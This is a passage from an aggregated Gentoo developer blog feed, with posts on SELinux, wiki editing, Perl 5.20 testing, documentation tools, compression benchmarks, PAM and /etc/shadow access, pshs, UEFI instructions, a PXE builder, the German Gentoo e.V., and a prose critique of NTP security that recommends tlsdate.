  • SELinux is widely known and many resources exist for users, administrators and engineers to learn more about it. The resources are freely available, and often kept up2date by a very motivated community. Unlike commercial products, whose support pages are hidden behind paywalls, customers are usually prevented from interacting with each other and tips and tricks for using the product are often not found on the Internet, SELinux information can be found almost everywhere. And if you like books, I have a couple for you to read: SELinux System Administration and SELinux Cookbook, written by yours truly.
  • Using SELinux is widely supported by third party configuration management tools, especially in the free software world. Puppet, Chef, Ansible, SaltStack and others all support SELinux and/or have modules that integrate SELinux support in the management system.
  • Using SELinux incurs no additional licensing costs.

Now, SELinux is definitely not a holy grail. It has its limitations, so security should still be seen as a global approach where SELinux is just playing one specific role in. For instance, SELinux does not prevent application behavior that is allowed by the policy. If a user abuses a configuration and can have an application expose information that the user usually does not have access to, but the application itself does (for instance because other users on that application might) SELinux cannot do anything about it (well, not as long as the application is not made SELinux-aware). Also, vulnerabilities that exploit application internals are not controlled by SELinux access controls. It is the application behavior (“external view”) that SELinux controls. To mitigate in-application vulnerabilities, other approaches need to be considered (such as memory protections for free software solutions, which can protect against some kinds of exploits – see grsecurity as one of the solutions that could be used).

Still, I believe that SELinux can definitely provide additional protections for such “one-time deployments” where a company cannot invest in resources to provide engineering services on those deployments. The SELinux security controls do not require engineering on the application side, making investments in SELinux engineering very much reusable.

Gentoo Wiki is growing (January 03, 2015, 08:09 UTC)

Perhaps it is because of the winter holidays, but the last weeks I’ve noticed a lot of updates and edits on the Gentoo wiki.

The move to the Tyrian layout, whose purpose is to eventually become the unified layout for all Gentoo resources, happened first. Then, three common templates (Code, File and Kernel) where deprecated in favor of their “*Box” counterparts (CodeBox, FileBox and KernelBox). These provide better parameter support (which should make future updates on the templates easier to implement) as well as syntax highlighting.

But the wiki also saw a number of contributions being added. I added a short article on Efibootmgr as the Gentoo handbook now also uses it for its EFI related instructions, but other users added quite a few additional articles as well. As they come along, articles are being marked by editors for translation. For me, that’s a trigger.

Whenever a wiki article is marked for translations, it shows up on the PageTranslation list. When I have time, I pick one of these articles and try to update it to move to a common style (the Guidelines page is the “official” one, and I have a Styleguide in which I elaborate a bit more on the use). Having a common style gives a better look and feel to the articles (as they are then more alike), gives a common documentation development approach (so everyone can join in and update documentation in a similar layout/structure) and – most importantly – reduces the number of edits that do little more than switch from one formatting to another.

When an article has been edited, I mark it for translation, and then the real workhorse on the wiki starts. We have several active translators on the Gentoo wiki, who we cannot thank hard enough for their work (I used to start at Gentoo as a translator, I have some feeling about their work). They make the Gentoo documentation reachable for a broader audience. Thanks to the use of the translation extension (kindly offered by the Gentoo wiki admins, who have been working quite hard the last few weeks on improving the wiki infrastructure) translations are easier to handle and follow through.

The advantage of a translation-marked article is that any change on the article also shows up on the list again, allowing me to look at the change and perform edits when necessary. For the end user, this is behind the scenes – an update on an article shows up immediately, which is fine. But for me (and perhaps other editors as well) this gives a nice overview of changes to articles (watchlists can only go so far) and also shows the changes in a simple yet efficient manner. Thanks to this approach, we can more actively follow up on edits and improve where necessary.

Now, editing is not always just a few minutes of work. Consider the GRUB2 article on the wiki. It was marked for translation, but had some issues with its style. It was very verbose (which is not a bad thing, but suggests to split information towards multiple articles) and quite a few open discussions on its Discussions page. I started editing the article around 13.12h local time, and ended at 19.40h. Unlike with offline documentation, the entire process of the editing can be followed through the page’ history). And although I’m still not 100% satisfied with the result, it is imo easier to follow through and read.

However, don’t get me wrong – I do not feel that the article was wrong in any way. Although I would appreciate articles that immediately follow a style, I rather see more contributions (which we can then edit towards the new style) than that we would start penalizing contributors that don’t use the style. That would work contra-productive, because it is far easier to update the style of an article than to write articles. We should try and get more contributors to document aspects of their Gentoo journey.

So, please keep them coming. If you find a lack of (good) information for something, start jotting down what you know in an article. We’ll gladly help you out with editing and improving the article then, but the content is something you are probably best to write down.

January 02, 2015
Andreas K. Hüttel a.k.a. dilfridge (homepage, bugs)

Most of us in the Gentoo Perl packaging team are already running ~arch Perl even on otherwise stable machines, and Perl 5.20 is looking very good so far. Our current plan is to wait for another month or similar and file the stabilization request for it in February. This would be a real achievement, since we'd at that time actually have the latest and greatest upstream stable Perl release also stable in Gentoo; this hasn't been the case for a very long time.
Of course, we need testers for that; the architecture teams cannot possibly try out all Perl programs in Gentoo with the new version. So, if you're feeling adventurous, and if you are running a fully updated stable system, please help us!
What do you need to do? First, upgrade perl-cleaner to ~arch by placing the following line in your package.keywords (or package.accept_keywords)
app-admin/perl-cleaner
and updating perl-cleaner (to currently 2.19):
emerge -u1a perl-cleaner
Then, upgrade Perl (and only Perl) to ~arch by placing the following exact three lines in your package.keywords (or package.accept_keywords):
dev-lang/perl
virtual/perl-*
perl-core/*
Then, upgrade your system with
emerge -uDNav world
perl-cleaner --all
This should now already be much easier than with previous Perl versions. In theory, all Perl packages should be rebuilt by emerge via the subslot rebuild mechanism, and perl-cleaner should not find anything to do anymore, but we cannot be 100% sure of that yet so far. (Looking forward to feedback.)
Well, and then use Perl and use your system, and if you encounter any problems, file bugs!!!

A final remark, once Perl 5.20 becomes stable you may want to remove above keywording lines from your portage configuration again.

Luca Barbato a.k.a. lu_zero (homepage, bugs)
Document your project! (January 02, 2015, 16:45 UTC)

After discussing how to track your bugs and your contributions, let see what we have about documentation

Pain and documentation

An healthy Open Source project needs mainly contributors, contributors are usually your users. You get users if the project is known and useful. (and you do not have parasitic entities syphoning your work abusing git-merge, best luck to io.js and markdown-it to not have this experience, switching name is enough of a pain without it).

In order to gain mindshare, the best thing is making what you do easier to use and that requires documenting what you did! The process is usually boring, time consuming and every time you change something you have to make sure the documentation still matches reality.

In the opensource community we have multiple options on the kind of documentation we produce and how to produce.

Wiki

When you need to keep some structure, but you want to have an easy way to edit it wiki can be a good choice and it can lead to nice results. The information present is usually correct and if enough people keep editing it up to date.

Pros:

  • The wiki is quick to edit and you can have people contribute by just using a browser.
  • The documentation is indexed by the search engines easily
  • It can be restricted to a number of trusted people
Cons

  • The information is detached from the actual code and it could desync easily
  • Even if kept up to date, what applies to the current release is not what your poor user might have
  • Usually keeping versioned content is not that simple

Forum

Even if usually they are noisy forums are a good source of information plenty of time.
Personally I try to move interesting bits to a wiki page when I found something that is not completely transient.

Pros:

  • Usually everything require less developer interaction
  • User can share solutions to their problem effectively
Cons

  • The information can get stale even quicker that what you have in the wiki
  • Since it is mainly user-generate the solutions proposed might be suboptimal
  • Being highly interactive it requires more dedicated people to take care of unruly users

Manuals

There are lots of good toolchain to write full manuals as we have in Gentoo.

The old style xml/docbook tend to have a really steep learning curve, not to mention the even more quirky and wonderful monster such as LaTeX (and the lesser texinfo). ReStructuredText, asciidoc and some flavour of markdown seem to be a better tool for the task if you need speed and get contributors up to speed.

Pros:

  • A proper manual can be easily pinned to a specific release
  • It can be versioned using git
  • Some people still like something they can print and has a proper index
Cons

  • With the old tools it is a pain to start it
  • The learning curve can be still unbearable for most contributors
  • It requires some additional dedication to keep it up to date

What to use and why

Usually for small projects the manual is the README, once it grows usually a wiki is the best place to put notes from multiple people. If you are good at it a manual is a boon for all your users.

Tools to have documentation-in-code such as doxygen or docurium can help a lot if your project is having a single codebase.

If you need to unify a LOT of different information, like we have in Gentoo. The problems usually get much more annoying since you have contents written in multiple markups, living in multiple places and usually moving it from one place to another requires a serious editing effort (like moving from our guidexml to the current semantic wiki).

Markup suggestion

Markdown/CommonMark/Kramdown

I do like a lot CommonMark and I even started to port and extend it to be used in docutils since I find ReStructuredText too confusing for the normal users. The best quality of it is the natural flow, it is most annoying defect is that there are too many parser discrepancies and sometimes implementations disagrees. Still is better to have many good implementation than one subpar in everything (hi texinfo, I hate your toolchain).

Asciidoc

The markup is quite nice (up to a point) and the toolchain is sort of nice even if it feels like a Rube Goldberg machine. To my knowledge there is a single implementation of it and that makes me MUCH wary of using it in new projects.

ReStructuredText

The markup is not as intuitive as Asciidoc, thus quite far from Markdown immediate-use feeling, but it has great toolchain (if you like python) and it gets extended to produce lots of different well formatted documents.
It comes with loads markup features that Markdown core lacks: include directive, table of contents, pluggable generic block and span directives, 3 different flavours of tables.

Good if you can come to terms with its complexity all in all.

What’s next

Hopefully during this year among my many smaller and bigger projects, I’ll find time to put together something nice for documentation as well.

January 01, 2015
Patrick Lauer a.k.a. bonsaikitten (homepage, bugs)
Compression comparison (January 01, 2015, 10:59 UTC)

Random question of the day: How do different compression methods compare?
This fancy miserable graph is the result of a few minutes of scripting around. Red is time, Yellow is size.

Input file was stage3-amd64-20141204.tar.bz2, uncompressed 720MB (tar).
For every compression algorithm I went from compression levels -1 .. -9 and recorded both resulting size and time needed. Amusingly time in seconds and size in MB are in a similar dimension, so the graph fits quite nicely
(Bonus exercise: How much time does unpacking need?)
Edit: Just tested that. So - lz4 takes between 1 and 0.85 seconds to unpack to /dev/zero. Higher compression levels *go faster* - counterintuitive, but fun.
gzip shows the same behaviour with 5.7 .. 5.1 seconds.
bzip2 goes from 27 to 35 seconds, where higher compression levels take longer to unpack.
And xz takes 80 .. 57 seconds, going 'backwards' like lz4.
-End edit -

By far the fastest is lz4, doing over 200MB/s effective. The slowest is xz at around 2MB/s.
But lz4 also only shrinks it to about 50% of the input size, while xz gets it down to 18%. So there's some interesting tradeoffs to be found.

gzip -9 and bzip -1 are roughly comparable for this dataset.
But gzip gets silly slow, so gzip -6 seems to be the best time/space tradeoff.
lz4 also doesn't improve a lot at higher levels, just spends more time.

The clear winner for size is xz, but the compression time is very noticeably higher than the competition. Still, xz -1 is comparable to bzip2 -9 - that's quite amusing.

So, if you're CPU-limited lz4 is best, if you are bandwidth-limited xz is best, and in between there's a wide fuzzy area of tradeoffs.

Oh well, here's the raw data:

	level	time	size
lz4	1	3.4	326
	2	3.5	326
	3	3.5	326
	4	13.5	266
	5	16.3	263
	6	19.6	261
	7	22.8	260
	8	26.8	260
	9	30.6	260
			
gzip	1	15.4	260
	2	16.2	254
	3	20.1	248
	4	21	240
	5	27.8	234
	6	40.7	231
	7	50.3	230
	8	83.3	230
	9	126.6	229
			
bzip2	1	78	218
	2	77	211
	3	77	207
	4	79	204
	5	81	203
	6	80	201
	7	85	200
	8	87	199
	9	91	198
			
xz	1	77	184
	2	103	175
	3	144	167
	4	210	160
	5	276	150
	6	320	149
	7	328	136
	8	340	133
	9	354	132

December 30, 2014
Sven Vermeulen a.k.a. swift (homepage, bugs)
Why does it access /etc/shadow? (December 30, 2014, 20:48 UTC)

While updating the SELinux policy for the Courier IMAP daemon, I noticed that it (well, the authdaemon that is part of Courier) wanted to access /etc/shadow, which is of course a big no-no. It doesn’t take long to know that this is through the PAM support (more specifically, pam_unix.so). But why? After all, pam_unix.so should try to execute unix_chkpwd to verify a password and not read in the shadow file directly (which would require all PAM-aware applications to be granted access to the shadow file).

So I dived into the PAM-Linux sources (yay free software).

In pam_unix_passwd.c, the _unix_run_verify_binary() method is called but only if the get_account_info() method returns PAM_UNIX_RUN_HELPER.

static int _unix_verify_shadow(pam_handle_t *pamh, const char *user, unsigned int ctrl)
{
...
        retval = get_account_info(pamh, user, &pwent, &spent);
...
        if (retval == PAM_UNIX_RUN_HELPER) {
                retval = _unix_run_verify_binary(pamh, ctrl, user, &daysleft);
                if (retval == PAM_AUTH_ERR || retval == PAM_USER_UNKNOWN)
                        return retval;
        }

In passverify.c this method will check the password entry file and, if the entry is a shadow file, will return PAM_UNIX_RUN_HELPER if the current user id is not root, or if SELinux is enabled:

PAMH_ARG_DECL(int get_account_info,
        const char *name, struct passwd **pwd, struct spwd **spwdent)
{
        /* UNIX passwords area */
        *pwd = pam_modutil_getpwnam(pamh, name);        /* Get password file entry... */
        *spwdent = NULL;
 
        if (*pwd != NULL) {
...
                } else if (is_pwd_shadowed(*pwd)) {
                        /*
                         * ...and shadow password file entry for this user,
                         * if shadowing is enabled
                         */
#ifndef HELPER_COMPILE
                        if (geteuid() || SELINUX_ENABLED)
                                return PAM_UNIX_RUN_HELPER;
#endif

The SELINUX_ENABLED is a C macro defined in the same file:

#ifdef WITH_SELINUX
#include <selinux/selinux.h>
#define SELINUX_ENABLED is_selinux_enabled()>0
#else
#define SELINUX_ENABLED 0
#endif

And this is where my “aha” moment came forth: the Courier authdaemon runs as root, so its user id is 0. The geteuid() method will return 0, so the SELINUX_ENABLED macro must return non-zero for the proper path to be followed. A quick check in the audit logs, after disabling dontaudit lines, showed that the Courier IMAPd daemon wants to get the attribute(s) of the security_t file system (on which the SELinux information is exposed). As this was denied, the call to is_selinux_enabled() returns -1 (error) which, through the macro, becomes 0.

So granting selinux_getattr_fs(courier_authdaemon_t) was enough to get it to use the unix_chkpwd binary again.

To fix this properly, we need to grant this to all PAM using applications. There is an interface called auth_use_pam() in the policies, but that isn’t used by the Courier policy. Until now, that is ;-)

December 26, 2014
Michał Górny a.k.a. mgorny (homepage, bugs)
pshs — the awesome file sharing tool (December 26, 2014, 16:00 UTC)

For a long time I lacked a proper tool to quickly share a few files for a short time. The tools I was able to find either required some setup, installing client counterparts or sending my files to a third-party host. So I felt the need to write something new.

The HTTP protocol seemed an obvious choice. Relatively simple, efficient, with some client software installed almost everywhere. So I took HTTP::Server::Simple (I think) and wrote the first version of publish.pl script. I added a few features to that script but it never felt good enough…

So back in 2011 I decided to reboot the project. This time I decided to use C and libevent, and that’s how pshs came into being. With some development occuring in the last three years, lately I started adding new features aiming to turn it into something really awesome.

So what pshs is? It’s a simple, zero-configuration command-line HTTP server to share files. You pass a list of files and it lets you share them.


Screenshot of pshs

But what really makes pshs special are the features:

  1. it shares only the files specified on the command-line — no need for extra configuration, moving files to separate directories etc. It simply returns 404 for any path not specified on the command-line, whether it exists or not.
  2. Full, working Range support. You can resume interrupted downloads and seek freely. Confirmed that playing a movie remotely works just fine.
  3. Unless told otherwise, it chooses a random port to use. You don’t have to decide on one, you have use pshs alongside regular HTTP servers and other services, and you can freely run multiple instances of pshs if you need to. TODO: perform port search until free port is found on the interface having external IP.
  4. Netlink and UPnP support provide the best means to obtain the external IP. If you have one on local interface, pshs will find and print it. If you don’t, it will try to enable port forwarding using UPnP and obtain the external IP from a UPnP-compliant router.
  5. QRCode printing (idea copied from systemd). Want to text a link to your files? Just scan the code!
  6. MIME-type guessing. Well, it’s not that special but makes sure your images show up as imagines in a web browser rather than opaque files that can only be saved.
  7. Zero-configuration SSL/TLS support — the keys and a self-signed certificate with correct public IP are generated at startup. While this is far from perfect (think of all the browsers complaining about self-signed certificates), it at least gives you the possibility of using encryption. It also prints the certificate fingerprint if you’d like to verify the authenticity.

I have also a few nice ideas in TODO, yet unsure which of them will be actually implemented:

  1. HTTP digest authentication support — in case you wanted some real security on the files you share.
  2. Download progress reporting — to let you know if and for how long do you need to keep the server up. Sadly, this does not look easy given the current libevent design.
  3. ncurses UI — to provide visual means for progress reporting :). Additional possibilities include keeping server URL on screen, a status line, and possibly scrolling logs.
  4. GTK+ UI with a tray icon and notification daemon support — to provide better desktop integration for sharing files from your favorite file manager.
  5. Recursive directory sharing — currently you have to list all files explicitly. This may include better directory indexes since currently pshs creates only one index of all files.

Which of those features would you find useful? What other features you’d like to see in pshs?

December 25, 2014
Gnome 3.14 (December 25, 2014, 23:46 UTC)

Gnome 3.14 ebuilds started hitting the tree a couple of days ago. Move is now complete and Gnome 3.14 was unmasked a couple of minutes ago. Besides the usual bumps, we worked on adding complete Wayland support. If you are eager to help upstream debug it, feel free to test but before filing any report, don’t forget to check upstream’s list of known limitations (like missing Drag’n’Drop, etc).

Gnome 3.14 also required GStreamer 1.4 that leio has been working on. First ebuilds have been added to allow Gnome unmasking, more to come.

We are also still looking for new recruits for the team as we are really low on active team members. If you feel like helping but are not sure about your skills, worry not, we can help you.

Diego E. Pettenò a.k.a. flameeyes (homepage, bugs)
Impressions of Android Wear in everyday life (December 25, 2014, 13:57 UTC)

All readers of this blog know I'm a gadgeteer, by now. I have been buying technogizmos at first chance if I had the money for it, and I was thus an early adopter of ebooks back in the days. I have, though, ignored wearables for various reasons.

Well, it's not strictly true — I did try Google Glass, in the past year. Twice, to be precise. Once the "standard" version, and once a version with prescription lenses – not my lenses though, so take it with a grain of salt – and neither time it excited me. In particular the former wouldn't be an option due to my need for prescription glasses, and the latter is a terrible option because I have an impression that the display is obstructing too much of the field of vision in that configuration.

Yes, I know I could wear contact lenses, but I'm scared of them so I'm not keeping them in mind. I'm also saving myself the pain in the eye for when smart contact lenses will tell me my blood glucose levels without having to prick myself every day.

Then smartwatches became all the rage and a friend of mine actually asked me whether I was going to buy one, since I seemed to be fond of accessories… well, the truth is that I'm not really that fond of them. It just gives the impression because I always have a bag on me and I like hats (yup even fedoras, not trilbies, feel free to assassinate my character for that if you want.)

By the way, the story of how I started using satchels is fun: when I first visited London, I went with some friends of mine, and one of the things that we intended on doing was going to the so-called Gathering Hall that Capcom set up for players of Monster Hunter Freedom Unite. My option to bring around the PSP were pants' pockets or a cumbersome backpack — one of my friends just bought a new bag at a Camden Town stall which instead fit the PSP perfectly, and he had space to make the odd buy and not worry where to stash it. I ended up buying the same model in a different colour.

Then Christmas came and I got a G Watch as a gift. I originally wanted to just redirect it to my sister — but since she's an iPhone user that was not an option, and I ended up trying it out myself. I have to say that it's an interesting gadget, which I wouldn't have bought by myself but I'm actually enjoying.

The first thing you notice when starting to use it is that its main benefit is stopping you from turning on your phone display — because you almost always do it for two reasons: check the time and check your notifications, both things you can do by flicking your wrist. I wonder if this can be count as security, as I've been "asked the time" plenty of times around Dublin by now and I would like to avoid a repeat.

Of course during the day most of the phone's notifications are work-related: email asking me to do something, reminders about meetings, alerts when I'm oncall, … and in that the watch is pretty useful, as you can silence the phone and rather have the watch "buzz" you by vibrating — a perfect option for the office where you don't want to disturb everybody around you, as well as the street where the noise would make it difficult to hear the notification sounds — even more when you stashed the phone in your bag as I usually do.

But the part that surprised me the most as usefulness is using it at home — even though things got a bit trickier there as I can't get a full coverage of the (small) apartment I rent. On the other hand, if I leave the phone on my coffee table from which I'm typing right now, I can get full coverage to the kitchen, which is what makes it so useful at home for me: I can set the timer when cooking, and I have not burnt anything since I got the watch — yes I'm terrible that way.

Before I would have to either use Google Search to set the alarm on one of the computers, or use the phone to set it — the former tends to be easily forgotten and it's annoying to stop when focusing on a different tab/window/computer, the latter require me to unlock to set up the timer, and while Google Now on any screen should be working, it does not seem to stick for me. The watch can be enabled by a simple flick of the wrist, and respond to voice commands mostly correctly (I still make the mistake of saying «set timer to 3 minutes» which gets interpreted as «set timer 23 minutes»), and is easy to stop (just palm it off).

I also started using my phone to play Google Play Music on the Chromecast so I can control the playback from the phone itself — which is handy when I get a call or a delivery at the door, or whatever else. It does feel like living in the future if I can control whatever is playing over my audio system from a different room.

One thing that I needed to do, though, was replace the original plastic strap. The reason is very much personal but I think it might be a useful suggestion to others to know that it is a very simple procedure — in my case i just jumped into a jewelry and asked for a leather strap, half an hour later they had my watch almost ready to go, they just needed to get my measure to open the right holes in it. Unlike the G Watch R – which honestly looks much better both on pictures and in real life, in my opinion much better than the Moto 360 too, as the latter appears too round to me – the original G Watch has a standard 22mm strap connector, which makes it trivial to replace for a watch repair shop.

With the new strap, the watch is almost weightless to me, partly because the leather is lighter than the plastic, partly because it does not stick to my hair and pull me every which way. Originally I wanted a metal strap, honestly, because that's the kind of watches I used to wear — but the metal interferes with Bluetooth reception and that's poor already as is on my phone. It also proves a challenge for charging as most metal straps are closed loops and the cradle needs to fit in the middle of it.

Speaking of reception, I have been cursing hard about the bad reception even at my apartment — this somehow stopped the other day, and only two things happened when it improved: I changed the strap and I kicked the Pear app — mostly because it was driving me crazy as it kept buzzing me that the phone was away and back while just staying in my pocket. Since I don't think, although I can't exclude, that the original strap was cause for the bad reception, I decided that I'm blaming the Pear app and not have it on my phone any more. With better connectivity, better battery life came, and the watch was able to reach one and a half full days which is pretty good for it.

I'm not sure if wearables are a good choice for the future — plenty of things in the past thought they were here to stay. This is by far not the first try to make a smart watch of course, I remember those that would sync with a PC by using video interference. We'll see what it comes down to. For the moment I'm happy for the gift I received — but I'm not sure if I would buy it myself if I had to.

December 23, 2014
Sven Vermeulen a.k.a. swift (homepage, bugs)
Added UEFI instructions to AMD64/x86 handbooks (December 23, 2014, 16:08 UTC)

I just finished up adding some UEFI instructions to the Gentoo handbooks for AMD64 and x86 (I don’t know how many systems are still using x86 instead of the AMD64 one, and if those support UEFI, but the instructions are shared and they don’t collide). The entire EFI stuff can probably be improved a lot, but basically the things that were added are:

  1. boot the system using UEFI already if possible (which is needed for efibootmgr to access the EFI variables). This is not entirely mandatory (as efibootmgr is not mandatory to boot a system) but recommended.
  2. use vfat for the /boot/ location, as this now becomes the EFI System Partition.
  3. configure the Linux kernel to support EFI stub and EFI variables
  4. install the Linux kernel as the bootx64.efi file to boot the system with
  5. use efibootmgr to add boot options (if required) and create an EFI boot entry called “Gentoo”

If you find grave errors, please do mention them (either on a talk page on the wiki, as a bug or through IRC) so it is picked up. All developers and trusted contributors on the wiki have access to the files so can edit where needed (but do take care that, if something is edited, that it is either architecture-specific or shared across all architectures – check the page when editing; if it is Handbook:Parts then it is shared, and Handbook:AMD64 is specific for the architecture). And if I’m online I’ll of course act on it quickly.

Oh, and no – it is not a bug that there is a (now not used) /dev/sda1 “bios” partition. Due to the differences with the possible installation alternatives, it is easier for us (me) to just document a common partition layout than to try and write everything out (making it just harder for new users to follow the instructions).

December 20, 2014
Alexys Jacob a.k.a. ultrabug (homepage, bugs)
Gentoo Linux PXE builder (December 20, 2014, 18:06 UTC)

Due to a bad hardware failure a few weeks ago at work, I had to rebuild a good part of our PXE stack and I ended up once again looking for the steps to build a PXE-ready Gentoo initramfs.

Then I realized that, while I was at it, I wanted this PXE initramfs to feature more than a Live CD like boot because I use PXE to actually install my servers automatically using ansible. So why not embed all my needs straight into the PXE initramfs and automate the whole boring creation process of it ?

That what the gentoo-pxe-builder project is about and I thought I’d open source it in case it could help and spare some time to anyone else.

The main idea is to provide a simple bash script which bases itself on the latest Gentoo liveCD kernel/initramfs to prepare a PXE suitable version which you can easily hack into without having to handle all the squashfs/cpio hassle to rebuild it.

Quick steps it does for you :

  • download the latest live CD
  • extract the kernel / initramfs from it
  • patch the embedded squashfs to make it PXE ready
  • setup SSH and a default root password so you can connect to your PXE booted machine directly
  • add a hackable local.d start script which will be executed at the end of the PXE boot

The provided local.d start script provides IP address display so you can actually see the IP address being setup on your PXE host and it will also display the real name of the network interfaces detected on the host based on udev deterministic naming.

You can read everything in more details on the project’s README.

Of course it’s mainly oriented to my use case and I’m sure the process / patching could be even more elegant so anyone feel free to contribute or ask/propose some features, I’ll happily follow them up !

Sebastian Pipping a.k.a. sping (homepage, bugs)

Vorwort und Rückblick

Der Fördervereich Gentoo e.V. besteht seit 2003. Ende 2009 wurde er fast aufgelöst. Die Auflösung wurde damals durch Findung von zwei neuen Vorstands-Vorsitzenden — Robert Buchholz und Sebastian Pipping, beide Mitglied seit Oktober 2009 — abgewendet.

Ein paar Dinge sind seitdem (unter verschwiedenen Vorständen) im Verein in Schwung gekommen:

  • Neue T-Shirts
  • Erstmals Gentoo-Tassen
  • Erstmals Gentoo-Plakate
  • Erstmals Gentoo-Lanyards
  • Stand-Banner für Messen
  • Intern Wechsel von CVS zu Git
  • Wechsel von bezahltem Server bei Hetzner zu gesponsorten Server von Manitu und SysEleven (dickes Danke!)

Andere Dinge sind weniger toll gelaufen:

  • Eine ordentliche Mitgliederversammlung wurde verschlafen (und der Vorstand davon später entlastet)
  • Die Idee mit Mitgliederversammlungen im Chat ist gescheitert (an Formalien und an Authentifizierung)
  • Protokolle von Mitgliedsversammlungen kamen meist deutlich später als nötig
  • Der Umzug des Vereinssitzes von Oberhausen nach Berlin ist formal noch immer nicht in trockenen Tüchern
  • In 2014 waren mehrere Dienste für Wochen down
  • Erst seit 2014 werden die Server zeitnah up-to-date gehalten
  • Wir sind den Mitgliedern zu wenig mit dem Zahlen der Mitgliedsgebühren hinterhergelaufen.

Da im Verein effektiv nur der Vorstand aktiv ist und alle Vorstandsmitglieder inzwischen in Vollzeit angestellt sind und weniger Zeit für den Gentoo e.V. bleibt, als gut wäre, stellt sie nun wieder die Frage, …

wie lange der Gentoo e.V. noch bestehen kann, wenn sich nicht neue Aktive finden, um bis Dezember 2015 den Vorstand effektiv abzulösen.

Was macht der Verein bisher?

Service nach außen

  • Präsenz auf Messen/Kongressen (z.B LinuxTag Berlin oder 31c3)
  • Erstellung und Beschaffung von Merchandise (alphabetisch)
    • Buttons (mit Magnet oder Nadel)
    • Plakate
    • Sticker
    • Tassen
    • T-Thirts
  • Betrieb des Rsync-Mirrors rsync1.de.gentoo.org (komplett aus einer RAM-Disk)
  • Betrieb der Userkarte
  • Halten von Domains wie gentoo.de, portage.de und anderen
  • Management der Marke “Gentoo”
    • Ausstellung von Lizenzen
  • Betrieb von Mailinglisten discussion, announce und Mitglieder
  • Berichte nach außen (z.B. über Events)

Service nach innen

  • Server/Software (sicher, funktional und) up-to-date halten
    • Basis-System updaten alle paar Tage, aktuell zwei Machinen
    • Redmine (+ Theme), MediaWiki (+Theme), Mailman updaten beziehungsweise portieren
  • Mitglieder-Koordination
    • Einladungen zu Mitgliederversammlungen schreiben (LaTeX)
    • Termin und Raumfindung zur Mitgliederversammlung
    • Protokolle texen und hochladen
    • Papier-Briefe an Mitglieder schicken, deren Mail-Adressen nicht erreichbar sind
    • Eintritte und Austritte in die Mitgliederdatenbank und den Mailman-Listen propagieren
    • Mitglieder an Beitragszahlungen erinnern
  • Finanzen
    • Ausgaben per Überweisung erstatten
    • Rechnungen organisieren
    • Jahres-Finanz-Bericht verfassen

Zukunft

Wir brauchen dich für:

  • Teile der laufenden Aufgaben übernehmen
  • Mit rechtlichen Dingen helfen:
    • Aktueller Vorstand mit rechtlichen Belangen bisher eher überfordert.
    • Gentoo-Nutzer-Anwälte bitte melden!
    • Mitglieder mit Erfahrungen aus anderen e.V.s auch gerne
    • Formaler Umzug des Vereins nach Berlin noch immer nicht in trockenen Tüchern.
    • Zu viel Raten bei e.V.-Formalia
  • Marke “Gentoo” braucht Zuwendung
    • Vereinheitlichung mit US-Marke Gentoo? (Stichwort Thread von Sven Vermeulen)
    • Verlängerung oder Auflösung oder Übertragung der EU-Marke an Gentoo Foundation?
  • Wieder mehr Präsenz auf Messen — aktuell zu wenig Menschen mit Zeit
  • Dein spannendes Gentoo-Projekt, das einen Server braucht, auf unserer Hardware?
  • Andere frische neue Ideen!

Bitte auf dem 31c3 ansprechen oder melden per E-Mail bei vorstand at gentoo minus ev punkt org.

December 19, 2014
Hanno Böck a.k.a. hanno (homepage, bugs)
Don't update NTP – stop using it (December 19, 2014, 23:47 UTC)

Clocktl;dr Several severe vulnerabilities have been found in the time setting software NTP. The Network Time Protocol is not secure anyway due to the lack of a secure authentication mechanism. Better use tlsdate.

Today several severe vulnerabilities in the NTP software were published. On Linux and other Unix systems running the NTP daemon is widespread, so this will likely cause some havoc. I wanted to take this opportunity to argue that I think that NTP has to die.

In the old times before we had the Internet our computers already had an internal clock. It was just up to us to make sure it shows the correct time. These days we have something much more convenient – and less secure. We can set our clocks through the Internet from time servers. This is usually done with NTP.

NTP is pretty old, it was developed in the 80s, Wikipedia says it's one of the oldest Internet protocols in use. The standard NTP protocol has no cryptography (that wasn't really common in the 80s). Anyone can tamper with your NTP requests and send you a wrong time. Is this a problem? It turns out it is. Modern TLS connections increasingly rely on the system time as a part of security concepts. This includes certificate expiration, OCSP revocation checks, HSTS and HPKP. All of these have security considerations that in one way or another expect the time of your system to be correct.

Practical attack against HSTS on Ubuntu

At the Black Hat Europe conference last October in Amsterdam there was a talk presenting a pretty neat attack against HSTS (the background paper is here, unfortunately there seems to be no video of the talk). HSTS is a protocol to prevent so-called SSL-Stripping-Attacks. What does that mean? In many cases a user goes to a web page without specifying the protocol, e. g. he might just type www.example.com in his browser or follow a link from another unencrypted page. To avoid attacks here a web page can signal the browser that it wants to be accessed exclusively through HTTPS for a defined amount of time. TLS security is just an example here, there are probably other security mechanisms that in some way rely on time.

Here's the catch: The defined amount of time depends on a correct time source. On some systems manipulating the time is as easy as running a man in the middle attack on NTP. At the Black Hat talk a live attack against an Ubuntu system was presented. He also published his NTP-MitM-tool called Delorean. Some systems don't allow arbitrary time jumps, so there the attack is not that easy. But the bottom line is: The system time can be important for application security, so it needs to be secure. NTP is not.

Now there is an authenticated version of NTP. It is rarely used, but there's another catch: It has been shown to be insecure and nobody has bothered to fix it yet. There is a pre-shared-key mode that is not completely insecure, but that is not really practical for widespread use. So authenticated NTP won't rescue us. The latest versions of Chrome shows warnings in some situations when a highly implausible time is detected. That's a good move, but it's not a replacement for a secure system time.

There is another problem with NTP and that's the fact that it's using UDP. It can be abused for reflection attacks. UDP has no way of checking that the sender address of a network package is the real sender. Therefore one can abuse UDP services to amplify Denial-of-Service-attacks if there are commands that have a larger reply. It was found that NTP has such a command called monlist that has a large amplification factor and it was widely enabled until recently. Amplification is also a big problem for DNS servers, but that's another toppic.

tlsdate can improve security

While there is no secure dedicated time setting protocol, there is an alternative: TLS. A TLS packet contains a timestamp and that can be used to set your system time. This is kind of a hack. You're taking another protocol that happens to contain information about the time. But it works very well, there's a tool called tlsdate together with a timesetting daemon tlsdated written by Jacob Appelbaum.

There are some potential problems to consider with tlsdate, but none of them is even closely as serious as the problems of NTP. Adam Langley mentions here that using TLS for time setting and verifying the TLS certificate with the current system time is a circularity. However this isn't a problem if the existing system time is at least remotely close to the real time. If using tlsdate gets widespread and people add random servers as their time source strange things may happen. Just imagine server operator A thinks server B is a good time source and server operator B thinks server A is a good time source. Unlikely, but could be a problem. tlsdate defaults to the PTB (Physikalisch-Technische Bundesanstalt) as its default time source, that's an organization running atomic clocks in Germany. I hope they set their server time from the atomic clocks, then everything is fine. Also an issue is that you're delegating your trust to a server operator. Depending on what your attack scenario is that might be a problem. However it is a huge improvement trusting one time source compared to having a completely insecure time source.

